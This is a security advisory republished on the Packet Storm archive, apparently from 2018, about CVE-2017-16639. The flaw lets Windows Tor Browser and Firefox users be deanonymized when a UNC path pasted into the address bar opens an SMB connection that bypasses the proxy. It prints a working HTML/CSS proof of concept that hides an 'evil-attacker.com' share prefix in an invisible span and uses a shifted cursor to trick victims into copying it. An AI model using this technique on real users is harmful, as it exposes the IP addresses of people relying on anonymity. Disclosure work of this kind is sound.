exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Tor Browser SMB Deanonymization / Information Disclosure

Tor Browser SMB Deanonymization / Information Disclosure
Posted Sep 13, 2018
Authored by Filippo Cavallarin

Tor Browser versions prior to 8.0 are affected by an information disclosure vulnerability that allows remote attackers to bypass the intended anonymity feature and discover a client IP address. The vulnerability affects Windows users only and needs user interaction to be exploited.

tags | exploit, remote, info disclosure
systems | windows
advisories | CVE-2017-16639
SHA-256 | 5b1b6551f82ae1b8033ae157a5420a8e86e2df791a77602af401e147b60ad490

Tor Browser SMB Deanonymization / Information Disclosure

Change Mirror Download
Advisory ID:           SGMA18-002
Title: Tor Browser Deanonymization With SMB
Product: Tor Browser < 8.0, Firefox < 62 / < 60.2.0esr
Vendor: torproject.org, mozilla.org
Type: Information Disclosure
Risk level: 4 / 5
Credits: filippo.cavallarin@wearesegment.com
CVE: CVE-2017-16639
Vendor notification: 2017-11-02
Vendor fix: 2018-09-05
Public disclosure: 2018-09-12


Details

Tor Browser version < 8.0 and Firefox version < 62 / < 60.2.0esr are affected by an information disclosure vulnerability that allows remote attackers to bypass the intended anonymity feature and discover a client IP address. The vulnerability affects Windows users only and needs user interaction to be exploited.
It's a different vulnerability than CVE-2017-16541 (even if it's similar in the concept and it comes from the same author).

The vulnerability exists because the browser(s) fails to block UNC paths to be loaded in the address bar leading to a connection to an arbitrary SMB server.
The Universal Naming Convention (UNC) is the naming system used in Microsoft Windows for accessing shared network folders and printers. By accessing a UNC path it's possible to automatically mount a network share and access its resources. For example "dir \\evil-attacker.com\share\file" will connect to evil-attacker.com using SMB protocol and get access to shared file.
When a UNC path is typed or pasted into the address bar the operating system will immediately try to connect to the specified server bypassing the configured proxy and revealing the true identity of the user. Note that the connection is triggered as soon as the UNC path is pasted into the address bar (without the need to hit the return key).


PoC

To exploit this vulnerability an attacker needs to trick the victim into pasting its malicious UNC path into the address bar of its browser and wait for SMB packets on its server.
Of course it's not exactly easy to convince someone to paste untrusted text on it's browser's address bar, but some css may help us. Consider the following (valid) UNC path:

\\evil-attacker.com\share\http://trusted.site/

in an html page the path above can be written as
<span style="font-size:1px;opacity:0">\\evil-attacker.com\share\</span>http://trusted.site/
so it's displayed as
http://trusted.site/

Doing so, instead of trick someone into pasting untrusted text, an attacker may try to send its victims to a website he/she controls and convince them to copy/paste a plausible URL.
At this point the attacker needs to be sure that the whole path is copied including the small and invisible span at the beginning.
To do so he/she can use some css to change the mouse cursor to a "left-shifted" one so that the mouse selection starts a few pixels before the displayed cursor. To make this sort of fake cursor an attacker needs a tool like GIMP to create a transparent image 20 pixels wide and put the image of the text-selection cursor on its right side.
A working PoC will look like this:


<style>
*{
cursor: url(shifted-cursor.cur), auto ;
}
</style>

<p>Please copy/paste the url below in the addressbar:</p>
<p><span style="font-size:1px;opacity:0">\\evil-attacker.com\share\</span>http://trusted.site/</p>



Solution

Update Tor Browser to version >= 8.0
Update Firefox to version >= 62.0 or >= 60.2.0esr


References

https://www.torproject.org/
https://www.wearesegment.com/research/tor-browser-deanonymization-with-smb/
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close